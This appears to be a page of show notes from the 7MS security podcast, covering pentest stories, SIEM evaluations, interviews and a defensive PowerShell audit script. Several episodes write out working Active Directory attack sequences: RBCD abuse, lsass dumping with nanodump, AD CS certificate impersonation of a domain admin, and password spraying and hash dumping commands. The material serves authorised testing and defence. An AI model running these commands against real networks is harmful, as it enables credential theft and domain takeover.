    In regards to defending against secretsdump, I found this article to be super interesting.


    7MS #525: First Impressions of InsightIDR - Part 2 Jun 17, 2022

    Today we're sharing an update to episode #512, where we ran Rapid7's InsightIDR through a bunch of attacks:

    • Active Directory enumeration via SharpHound

    • Password spraying through Rubeus

    • Kerberoasting and ASREPRoasting via Rubeus

    • Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi.

    • Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping.

    • Pass-the-hash attacks with CrackMapExec

    In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves:

    • Getting Started with Rapid7 InsightIDR: A SIEM Tutorial
    • Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

    7MS #524: How to Update VMWare ESXi From the Command Line Jun 10, 2022

    I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY

    Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates:

    1. List all upgrade profiles:
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
    2. Grep for just the ones you want (in my case ESXi 7.x):
    esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0
    3. Apply the one you want (replace PROFILE-NAME-FROM-STEP-2 with the profile name you picked in step 2):
    esxcli software profile update --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p PROFILE-NAME-FROM-STEP-2

    7MS #523: Local Administrator Password Solution - RELOADED! Jun 03, 2022

    Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017!

    Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go!

    (See the show notes for today's episode for more details!)


    7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2 May 27, 2022

    Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.


    7MS #521: Tales of Pentest Pwnage - Part 36 May 20, 2022

    Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

    # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system:
    runas /netonly /user:domain\some.user cmd.exe
    # Make new machine account:
    New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose
    # Get the SID:
    $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid
    # Create raw descriptor for fake computer principal:
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    # Apply descriptor to victim machine:
    Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box:
    getST.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah!
    # Set the ticket:
    export KRB5CCNAME=badmin.ccache
    # Dump victim server's secrets!
    secretsdump.py -debug -k -no-pass SERVER-I-WANT-2-PWN

    Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

    Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!


    7MS #520: How to Succeed in Business Without Really Crying - Part 11 May 13, 2022

    Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include:

    • Setting the right communication cadence - and communication channels - with a customer during a pentest.

    • Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).

    • How we're using Intercom to publish self-help/FAQ articles for 7MS.


    7MS #519: Tales of Pentest Pwnage - Part 35 May 07, 2022

    Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review:

    • BloodHound edges
    • DACL Trouble: Generic All on OUs
    • AD prep bug in Windows Server 2016

    7MS #518: Interview with Amanda Berlin of Blumira Apr 27, 2022

    Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include:

    • Can you tell us more about your infosec superhero origin story and creation of your book?

    • Will there ever be a new version of the Defensive Security Handbook?

    • What blue team certs/YouTube vids/classes/conferences give the best bang for your buck?

    • Was it a mistake to invent computers?

    • From a logging standpoint, what devices provide blind spots (Linux systems, IoT devices, etc.)?

    • You can wave a magic wand and solve any three security challenges instantly - what do you choose?

    • Infosec Twitter drama. Love it? Leave it? Something in between?

    • Tips to prevent business email compromise?

    • How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web?

    • Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)


    7MS #517: DIY Pentest Dropbox Tips - Part 6 Apr 22, 2022

    Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover:

    Auto installing Splashtop

    This can be done automatically by downloading your splashtop.exe install and issuing this command:

    splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2

    Auto installing Ninite

    This can be done in a batch script like so:

    agent.msi /quiet
    ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt

    The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt

    Auto installing Uptimerobot monitoring

    We do this by first creating a script called c:\uptimerobot.ps1 that makes the "phone home" call to UptimeRobot:

    Start-Transcript -Path c:\heartbeat.log -Append
    Invoke-WebRequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing
    Stop-Transcript

    Then we install the scheduled task itself like so:

    schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:\uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM"

    7MS #516: Tips to Travel More Securely Apr 14, 2022

    In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.


    7MS #515: Securing Your Family During and After a Disaster - Part 5 Apr 06, 2022

    Today we continue the series we started a few years ago called Securing Your Family During and After a Disaster (the last part in this series was from a few years ago). In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.


    7MS #514: Tales of Pentest Pwnage - Part 34 Mar 30, 2022

    Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:

    • I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile

    • Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn

    • Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!

    • Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!

    • LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it


    7MS #513: Interview with Christopher Fielder and Jon Crotty of Arctic Wolf Mar 23, 2022

    Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the report's key points here without needing to provide an email address). The three of us dig in to talk about some of the report's specific highlights, including:

    • Many orgs are running the bare minimum (or nothing!) for endpoint protection
    • Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether
    • Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburdened IT teams are taking on security as part of their job descriptions as well
    • Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk
    • The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure

    P.S. this is Christopher's fifth time on the program. Be sure to check out his first, second, third and fourth interviews with 7MS.


    7MS #512: First Impressions of InsightIDR Mar 17, 2022

    Today I'm sharing some first impressions of the Rapid 7 InsightIDR as kind of a teaser for an eventual new chapter in our Desperately Seeking a Super SIEM for SMBs series. Disclaimer: remember these are first impressions. There may be some missed detections I talk about today that are a me problem and not the technology. I hope to get to the root of those unresolved issues by the time I talk more formally about InsightIDR in a future episode. Enjoy!


    7MS #511: How to Succeed in Business Without Really Crying - Part 10 Mar 11, 2022

    Today we're continuing our series focused on owning a security consultancy, talking specifically about:

    • How not to give up on warm sales leads, even if they haven't panned out for 5+ years!

    • Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus

    • A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs


    7MS #510: First Impressions of Tailscale Mar 02, 2022

    Today we share some first impressions of Tailscale, a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!


    7MS #509: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 4 Feb 23, 2022

    Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.


    7MS #508: Tales of Pentest Pwnage - Part 33 Feb 18, 2022

    Hey friends! We have another fun tale of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

    We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile it standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first). So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

    # Windows system: tell your Windows system to trust the victim host you're about to PS into:
    winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"}
    # Windows system: PowerShell into the victim system:
    Enter-PSSession -ComputerName VICTIM-SERVER -Credential domain.com\pwneduser
    # Kali system: create and share a folder with nanodump.exe in it:
    sudo mkdir /share
    sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support
    # Victim system: copy nanodump from Kali box to VICTIM-SERVER:
    copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\
    # Victim system: get the PID for lsass.exe:
    tasklist /FI "IMAGENAME eq lsass.exe"
    # Victim system: use nano to do the lsass dump (replace x with the PID from the previous step):
    c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log
    # Victim system: get the log back to your Kali share:
    copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRESS\share\
    # Kali system: "fix" the dump and extract credz with pypykatz!
    sudo /opt/nanodump/restore_signature.sh toteslegit.log
    sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

    Enjoy delicious passwords and hashes in the dump.txt file!


    7MS #507: Interview with Matthew Warner of Blumira Feb 09, 2022

    Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira. We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 (Microsoft's audit policy recommendations, sysmon, sysmon modular), as well as how to get better logging in hard-to-reach places like Kerberos. Be sure to also check out Blumira's resources on detecting Kerberoasting and simplifying Windows log collection and ongoing management with Poshim. And please check out the Webinar we did together which demonstrates some common pentest attacks - and how Blumira can detect them!


    7MS #506: Tales of Pentest Pwnage - Part 32 Feb 03, 2022

    Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for maximum pwnage:

    • Run PingCastle
    • Do the SharpHound/BloodHound dumps
    • Run the DHCP poisoning module of Responder
    • Check the ms-DS-MachineAccountQuota value in the domain - if it's at the default (10), then any user can add machines to the domain.
    Why is the ability to add machines to the domain important? Because in the case of the sAMAccountName spoofing, if you have a non-domain-joined machine like I do, you need the ability to add a computer object to the domain. Check the Pentestlab.blog article for more info, but essentially, if you have an unpatched domain controller and the ability to add computer objects to the domain, you can pull off the attack. The article goes into crazy good technical detail, and here's my not-so-technical explanation:

    If I was on a pentest, and the DC was called 7MS-DC01, and I could join a machine to the domain (which, as a reminder, ANY user can do if the machine quota value is at the default value of 10), I could rename that machine account to be 7MS-DC01 without the dollar sign, request a TGT for the domain controller's account, then restore the machine name back to what it was before. Now, because the TGT is stored in memory, we can use the S4U2self Kerberos extension to request a service ticket using a domain admin account. And because the original ticket belonged to the 7MS-DC01 machine name, which now doesn't exist, Kerberos will look for 7MS-DC01$ and will issue the ticket for the requested service.

    I might've butchered that explanation mom, but I tried my best!

    TLDL/TLDR: find and exploit these unpatched domain controllers with noPac. Enjoy!


    7MS #505: Pwning Wifi PSKs and PMKIDs with Bettercap Jan 28, 2022

    Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap).


    7MS #504: Monitoring All Your Cloud Thingies with UptimeRobot Jan 20, 2022

    Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot. And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.


    7MS #503: First Impressions of Brute Ratel Jan 12, 2022

    Today's episode is all about Brute Ratel, a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement is, and the "killer feature" that makes me giggle like the bad guy from Sonic the Hedgehog.

    In the tangent department, Mrs. 7MS makes an appearance via phone and I bore you to tears about my continued iFly addiction.


    7MS #502: Building a Pentest Lab in Azure Jan 05, 2022

    Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the tips in today's episode will save you some time/headaches/money should you setup a pentesting training camp in the cloud.

    Things I like

    • No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)

    • You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation

    Things I don't like

    • VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:
    dsregcmd /leave
    Add-Computer -DomainName pwn.town -Restart
    • Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).

    • Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.

    • Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.

    • Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they need a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).

    Things that are broken

    • Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh.

    • Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.

    On a personal note, it has been good knowing you because I'm about to spend all my money on a new hobby: indoor skydiving.


    7MS #501: Tales of Pentest Pwnage - Part 31 Dec 29, 2021

    Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

    • Grab Certi
    • Grab Certify

    Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

    msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

    Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

    sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS'
    export KRB5CCNAME=MYUSER.ccache
    sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE-NAME

    From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

    rubeus.exe purge
    rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

    And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!


    7MS #500: Interview with John Strand Dec 22, 2021

    HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.


    7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6 Dec 16, 2021

    Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment:

    • ASREPRoasting

    • WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)

    • Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info
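    The defender-side settings these show notes keep coming back to (cached logons in #526, the WDigest and Restricted Admin registry flips in #499, ms-DS-MachineAccountQuota in #506, RBCD descriptors in #521 and ENROLLEE_SUPPLIES_SUBJECT templates in #501) collected into one read-only audit. This is an added example, not code from the podcast or its show notes; it assumes an elevated PowerShell session on a domain-joined host with the RSAT ActiveDirectory module, and the function names are my own.

```powershell
# Added example (not from the podcast): read-only audit of settings the show notes call out as
# attack enablers or compromise indicators. Registry checks are local to this host; the AD checks
# need only read access to the domain. Assumes RSAT ActiveDirectory is installed.

function Get-RegistryValueOrDefault {
    param([string]$Path, [string]$Name, $Default)
    try {
        return (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    } catch {
        return $Default   # value absent, so the OS default behaviour applies
    }
}

function New-Finding {
    param([string]$Check, $Value, [string]$Severity, [string]$Note)
    [pscustomobject]@{ Check = $Check; Value = $Value; Severity = $Severity; Note = $Note }
}

function Invoke-ShowNotesAudit {
    $findings = @()

    # Episode #526: cached domain logons (default 10). Each cached logon is a crackable DCC2 hash
    # on disk; 0 removes them but breaks interactive logon when no DC is reachable.
    $cached = [int](Get-RegistryValueOrDefault 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' 'CachedLogonsCount' '10')
    if ($cached -gt 0) {
        $findings += New-Finding 'CachedLogonsCount' $cached 'Medium' 'Cached domain credentials present; lower toward 0 where DC reachability allows.'
    }

    # Episode #499: UseLogonCredential=1 makes LSASS retain plaintext passwords. On current Windows the
    # value is normally absent, so finding it set to 1 is itself a tampering indicator.
    $wdigest = Get-RegistryValueOrDefault 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential' 0
    if ([int]$wdigest -eq 1) {
        $findings += New-Finding 'WDigest UseLogonCredential' $wdigest 'High' 'Plaintext credentials kept in LSASS; treat as a tampering indicator and set back to 0.'
    }

    # Episode #499: DisableRestrictedAdmin explicitly set to 0 turns Restricted Admin RDP on, which
    # permits pass-the-hash over RDP. The value is normally absent.
    $rarm = Get-RegistryValueOrDefault 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'DisableRestrictedAdmin' $null
    if ($null -ne $rarm -and [int]$rarm -eq 0) {
        $findings += New-Finding 'DisableRestrictedAdmin' $rarm 'High' 'Restricted Admin mode enabled; confirm this was a deliberate change.'
    }

    Import-Module ActiveDirectory -ErrorAction Stop
    $domain = Get-ADDomain

    # Episode #506: ms-DS-MachineAccountQuota (default 10) lets any authenticated user add computer
    # objects, which both the sAMAccountName spoofing and RBCD stories rely on.
    $quota = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    if ($quota -gt 0) {
        $findings += New-Finding 'ms-DS-MachineAccountQuota' $quota 'Medium' 'Any user can join machines; set to 0 and delegate joins to a dedicated group.'
    }

    # Episode #521: computers with resource-based constrained delegation configured. Every entry should
    # map to a known, documented delegation; an unexpected one is exactly what that episode abuses.
    $rbcd = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' -Properties PrincipalsAllowedToDelegateToAccount
    foreach ($computer in $rbcd) {
        $principals = ($computer.PrincipalsAllowedToDelegateToAccount | ForEach-Object { $_.ToString() }) -join ', '
        $findings += New-Finding "RBCD on $($computer.Name)" $principals 'Review' 'Verify every listed principal is an intended delegation.'
    }

    # Episode #501: templates whose msPKI-Certificate-Name-Flag (the LDAP name behind the flag Certify
    # prints) has the ENROLLEE_SUPPLIES_SUBJECT bit (0x1). The bit alone is not a vulnerability; it is the
    # first of the conditions in the Certified Pre-Owned paper, so each hit needs its enrollment rights and EKUs reviewed.
    $templateContainer = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
    $templates = Get-ADObject -SearchBase $templateContainer -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties 'msPKI-Certificate-Name-Flag'
    foreach ($template in $templates) {
        $flag = [int64]$template.'msPKI-Certificate-Name-Flag'
        if (($flag -band 1) -eq 1) {
            $findings += New-Finding "Template $($template.Name)" ('0x{0:X}' -f $flag) 'Review' 'ENROLLEE_SUPPLIES_SUBJECT set; check who can enroll and which EKUs it grants.'
        }
    }

    return $findings
}

Invoke-ShowNotesAudit | Format-Table -AutoSize -Wrap
```

    An empty table is the good outcome; the RBCD and template rows are review items rather than findings, since both features have legitimate uses.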


    7MS #498: Securing Your Mental Health - Part 2 Dec 13, 2021

    Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.


    7MS #497: The Stress and Satisfaction of Offering Live Security Training Dec 02, 2021

    Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.


    7MS #496: Tales of Pentest Pwnage - Part 30 Nov 24, 2021

    Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including:

    • The new Responder DHCP poisoning module
    • All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules!
    • Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon).

    I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!


    7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5 Nov 17, 2021

    Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect:

    • RDP from public IPs
    • Password spraying
    • Kerberoasting
    • Mimikatz
    • Recon net commands
    • Hash dumping
    • Hits on a "honey domain admin" account
    • Users with non-expiring passwords
    • Hits on the SSH/FTP/HTTP honeypot

    7MS #494: Interview with Josh Burnham of Liquid Web Nov 10, 2021

    7MS #493: 7MOIST - Part 2 Nov 04, 2021

    Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will hopefully make your life a little awesome-r:

    • Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day!

    • CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to!

    • Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!


    7MS #492: Tales of Pentest Pwnage - Part 29 Oct 28, 2021

    Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using:

    • Manual "open heart surgery" on the root of the Active Directory domain
    • The new totally rad DHCP poisoning module of Responder
    • An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441)

    7MS #491: Interview with Louis Evans of Arctic Wolf Oct 20, 2021

    Today we're joined by Louis Evans of Arctic Wolf to talk about all things cyber insurance, including:

    • History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without

    • What are insurance companies asking/demanding of customers before writing a cyber insurance policy?

    • What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)?

    • How do I evaluate the various insurance carriers out there and pick a good one?


    7MS #490: Desperately Seeking a Super SIEM for SMBs - Part 4 Oct 13, 2021

    Hey friends! Today we're going to recap the SIEM/SOC players we've evaluated so far (Arctic Wolf, Elastic, Sumo Logic, Milton Security) and then talk about a new contender that was brought to our attention: Blumira (not a sponsor, but I'm really digging what I'm seeing/hearing/experiencing thus far)!


    7MS #489: Ping Castle Oct 06, 2021

    Today we're talking about Ping Castle (not a sponsor), an awesome tool for enumerating tons of info out of your Active Directory environment and identifying weaknesses, misconfigurations and paths to escalation! It's wonderful for both red and blue teamers.

    Some of Ping Castle's cool features include being able to find:

    • Kerberoastable and ASREPRoastable users
    • Plain text passwords lingering in Group Policy Objects
    • Users with never-expiring passwords
    • Non-supported versions of Windows
    • Machines configured with unconstrained delegation
    • Attack and escalation paths to Domain Admins

    7MS #488: How to Succeed in Business Without Really Crying - Part 10 Sep 29, 2021

    Today we continue our series focused on building a security consultancy and talk about:

    • A phishing campaign that went off the rails, and lessons learned from it
    • First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor)
    • A tangent story about how my wife brought some thieves to justice!

    7MS #487: Light Pentest eBook Announcement! Sep 28, 2021

    Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase!

    Note: this eBook and the Light Pentest LITE training are two separate things, but do cover some of the same topics.

    The Light Pentest eBook covers:

    • Grabbing and analyzing packet captures
    • Abusing insecure network protocols
    • Exploiting (the lack of) SMB signing
    • Capturing, cracking and passing hashes
    • Locating high-value targets with DNS zone transfers
    • Exploiting vulnerable Group Policy Objects
    • Scraping screenshots of Web interfaces with WitnessMe
    • Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts
    • Dumping, passing and cracking hashes from domain controllers

    The Light Pentest eBook is available now for $7.77, and by purchasing it you are entitled to all future editions/revisions going forward.


    7MS #486: Interview with Matt Quammen of Blue Team Alpha Sep 22, 2021

    Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response! Topics covered include:

    • Top 5 things to do and not do during ransomware event
    • Challenges when responding to ransomware events
    • Opportunities to break into infosec/IR
    • The value of tabletop exercises, and some great ideas for conducting your own
    • Incident response stress and success stories
    • Cyber insurance - worth it or not?

    7MS #485: Interview with Christopher Fielder Sep 15, 2021

    Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling vendor/customer communication problems, and simplifying security product pricing to make purchases less stressful for customers!

    And don't forget to check out Christopher's first, second and third interviews with 7MS.


    7MS #484: Desperately Seeking a Super SIEM for SMBs - Part 3 Sep 08, 2021

    Today we're continuing our series called Desperately Seeking a Super SIEM for SMBs - this time with a focus on a new contender in our bake-off: Perch Security!

    It might help you to go back and take in part 1 and part 2, but today we're focusing on the first experience I had chatting with the sales/technical folks at Perch. TLDL: I really liked a lot of things I was hearing and seeing. Pros (perceived) include:

